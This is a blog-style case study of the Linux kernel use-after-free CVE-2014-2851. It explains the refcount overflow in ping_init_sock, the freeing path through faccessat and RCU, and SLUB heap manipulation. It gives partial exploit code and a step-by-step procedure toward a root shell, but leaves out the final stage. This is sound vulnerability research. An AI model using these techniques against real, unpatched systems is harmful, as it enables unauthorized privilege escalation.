Posted on January 2, 2016 at 12:10AM
This is a case study of the use-after-free vulnerability which was assigned CVE-2014-2851 and affected Linux kernels through 3.14.1. First of all, I'd like to thank Thomas for his help, his original write-up, and his GitHub PoC.
This bug might not be very practical (it takes a while to overflow a 32-bit integer), but it was an interesting vulnerability from an exploitation point of view. On our test system, the overall runtime to get a root shell (#) was just over 50 minutes :) There is a certain amount of indeterminism caused by RCU callbacks, which makes exploitation more difficult.
Our test system was 32-bit Ubuntu 14.04 LTS (3.13.0-24-generic kernel) SMP. First, we will describe the vulnerability and walk through its exploitation. We will then discuss the challenges encountered in exploiting this bug.
The vulnerable path shown below is reached when an ICMP socket is created. Note that even though standard users (on most Linux distributions) are not allowed to create ICMP sockets, no root privileges are required to reach the vulnerable code:
int ping_init_sock(struct sock *sk)
{
    struct net *net = sock_net(sk);
    kgid_t group = current_egid();
    struct group_info *group_info = get_current_groups();  [1]
    int i, j, count = group_info->ngroups;
    kgid_t low, high;

    inet_get_ping_group_range_net(net, &low, &high);

    if (gid_lte(low, group) && gid_lte(group, high))  [2]
        return 0;
    ...
The above path ([1] in particular) is reached when an ICMP socket is created in user space:
socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
The get_current_groups() function in [1] is defined as a macro
in include/linux/cred.h:
#define get_current_groups()                            \
({                                                      \
    struct group_info *__groups;                        \
    const struct cred *__cred;                          \
    __cred = current_cred();                            \
    __groups = get_group_info(__cred->group_info);      \  [3]
    __groups;                                           \
})
In [3], the get_group_info() function atomically increments the
group_info usage counter which is defined as a signed integer:
struct group_info {
    atomic_t usage;
    int ngroups;
    int nblocks;
    kgid_t small_block[32];
    kgid_t *blocks[];
};

typedef struct {
    int counter;
} atomic_t;
Every time a new ICMP socket is created, the usage counter is incremented by one in [1]. However, for an unprivileged user the check at [2] fails and the socket creation eventually fails with an error; crucially, no exit path in ping_init_sock() drops the reference taken at [1], so the usage counter is never decremented. We can therefore repeatedly create new ICMP sockets, overflowing this signed integer (0xffffffff + 1 = 0).
The group_info structure is shared among forked child processes. When the group_info usage counter becomes 0, there are a number of paths
in the kernel that may free it. One such path discovered by Thomas is the
faccessat() syscall:
SYSCALL_DEFINE3(faccessat, int, dfd, const char __user *, filename, int, mode)
{
    const struct cred *old_cred;
    struct cred *override_cred;
    int res;
    ...
    override_cred = prepare_creds();  [4]
    ...
out:
    revert_creds(old_cred);
    put_cred(override_cred);  [5]
    return res;
}
In [4], a new struct cred is allocated and its usage counter
(not to be confused with group_info->usage) is set to 1 and
group_info->usage counter is incremented by 1. The
put_cred in [5] then decrements the cred->usage
counter and calls __put_cred():
static inline void put_cred(const struct cred *_cred)
{
    struct cred *cred = (struct cred *) _cred;

    validate_creds(cred);
    if (atomic_dec_and_test(&(cred)->usage))
        __put_cred(cred);
}
An important part is that freeing the cred struct is implemented via RCU [6]:
void __put_cred(struct cred *cred)
{
    ...
    BUG_ON(cred == current->cred);
    BUG_ON(cred == current->real_cred);

    call_rcu(&cred->rcu, put_cred_rcu);  [6]
}
EXPORT_SYMBOL(__put_cred);
The following shows the put_cred_rcu callback function, which
in turn calls put_group_info() in [7] to free the
group_info struct when its usage counter becomes 0:
static void put_cred_rcu(struct rcu_head *rcu)
{
    struct cred *cred = container_of(rcu, struct cred, rcu);
    ...
    security_cred_free(cred);
    key_put(cred->session_keyring);
    key_put(cred->process_keyring);
    key_put(cred->thread_keyring);
    key_put(cred->request_key_auth);
    if (cred->group_info)
        put_group_info(cred->group_info);  [7]
    free_uid(cred->user);
    put_user_ns(cred->user_ns);
    kmem_cache_free(cred_jar, cred);
}
The put_group_info() function is defined as a macro that
decrements the group_info usage counter and if it reaches 0, frees
the allocated structure:
#define put_group_info(group_info)                      \
do {                                                    \
    if (atomic_dec_and_test(&(group_info)->usage))      \
        groups_free(group_info);                        \
} while (0)
It should be obvious by now that it is possible to free the
group_info struct by overflowing its usage counter to 0 and then
calling faccessat() from user space:
// increment the counter close to 0xffffffff
// (i must be unsigned so that -10 compares as 0xfffffff6)
unsigned int i;

for (i = 0; i < 0xfffffff6; i++) {
    socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
}

// increment the counter by 1 and try to free it
for (i = 0; i < 100; i++) {
    socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
    faccessat(0, "/", R_OK, AT_EACCESS);
}
The above code should overflow the usage counter and free the
group_info struct. Since freeing this structure is implemented as an
RCU call, there is a certain amount of indeterminism involved which is
discussed later in the "Challenges" section.
Once the group_info struct is freed, the SLUB allocator links it into the freelist. There are a number of good resources online describing the implementation of the SLUB allocator, so we will not discuss it here. It is sufficient to note that when an object is freed, it is put on the freelist and its first 4 bytes (on a 32-bit architecture) are overwritten with a pointer to the next free object in the slab. Hence, the first 4 bytes of group_info get overwritten with a valid kernel memory address. These same 4 bytes hold the usage counter, and we can still increment this pointer by creating ICMP sockets.
There are two possible scenarios when group_info is freed: either it is the only free object in its slab, or other free objects exist in the same slab. In the former case, the "next" free-object pointer of our freed group_info will be set to NULL. We will concentrate on the latter case, where this pointer is set to the next free object in the slab (this was the most common case in practice).
On our test system, the group_info struct is 140 bytes in size and is therefore allocated from the generic kmalloc-192 cache. When a request to allocate an object larger than 128 bytes and up to 192 bytes is received (via kmalloc, kmem_cache_alloc, etc.), the SLUB allocator will walk the freelist and eventually serve an allocation at the address our overwritten "usage" counter points to.
It is possible to "point" this address to user space by incrementing the usage counter again until it wraps around to a user-space address that we can mmap. For example, given a kernel address 0xf3XXXXXX, adding 0x10000000 wraps it to the user-space address 0x3XXXXXX, which we can mmap. In summary, the exploitation procedure can be described as follows:
1. Increment the group_info usage counter close to 0xffffffff by creating ICMP sockets
2. Attempt to free group_info via faccessat() && repeat until the free succeeds
3. The first 4 bytes of the freed group_info will be overwritten with a valid kernel memory address pointing to the next free object in the slab
4. Keep incrementing the group_info usage counter (by creating more ICMP sockets) until it points to some user-space memory address
5. mmap that user-space range and force the kernel to allocate some structure X from it

The structure X used in our exploit is the struct file, which
has the same size as group_info and contains a few function
pointers (e.g., file operations *f_op or to be more precise, a
pointer to struct containing function pointers). The file structs
can be allocated, for example, using the following code:
for (i = 0; i < N; i++)
fd = open("/etc/passwd", O_RDONLY);
If more than 1024 file descriptors are required, you can always fork another
process and allocate more file structs.
Once this file struct is allocated in our user-space range
0x3000000-0x4000000, we can simply search this memory range for the first
non-zero byte. This will be the beginning of our file struct:
unsigned *p;
struct file *f = NULL;

// find the file struct
for (p = (unsigned *)0x3000000; p < (unsigned *)0x4000000; p++) {
    if (*p) {
        f = (struct file *)p;
        break;
    }
}
From this point onward, the rest of the exploitation procedure is quite trivial.
Challenges
As mentioned in the "Exploitation" section, there is a certain amount of
indeterminism caused by RCU callbacks. For example,
ping_init_sock() followed by faccessat() in a loop may
not be performed in that order. Ideally, we want the following order:

1. Overflow the group_info usage counter to 0 (ping_init_sock())
2. Call faccessat(), whose RCU callback then frees group_info

However, the RCU callbacks are often accumulated and executed in batches.
The callback function "is called after all the CPUs in the system have gone through at least one quiescent state (such as context switch, idle loop, or user code)". Hence, it is often the case that a number of
ping_init_sock() calls are executed first (overflowing the counter and incrementing it back above 0), followed by a batch of RCU callbacks to put_cred_rcu(). This results in the group_info freeing path being skipped. However, we have found a way to order the aforementioned events of incrementing and checking the usage counter.
Another issue encountered while exploiting this vulnerability is related to the recovery phase. What happens if another object is requested from the same slab? In this case, we can always set the "next" freelist pointer of our object to NULL. The allocator will then set its freelist head to NULL which, in turn, forces it to create a new slab and "forget" about the current one.
Now, what if some object belonging to this particular slab is freed? This presented a real challenge, and we handled it with a post-exploitation LKM that repairs the slab state to stabilize the system.
In terms of practicality, this particular vulnerability is probably not
ideal since it takes a while to overflow the 32-bit usage counter :) On our
test system, the overall exploitation time was just over 50 minutes! However,
it is quite reliable (even on SMP platforms) once group_info is
freed.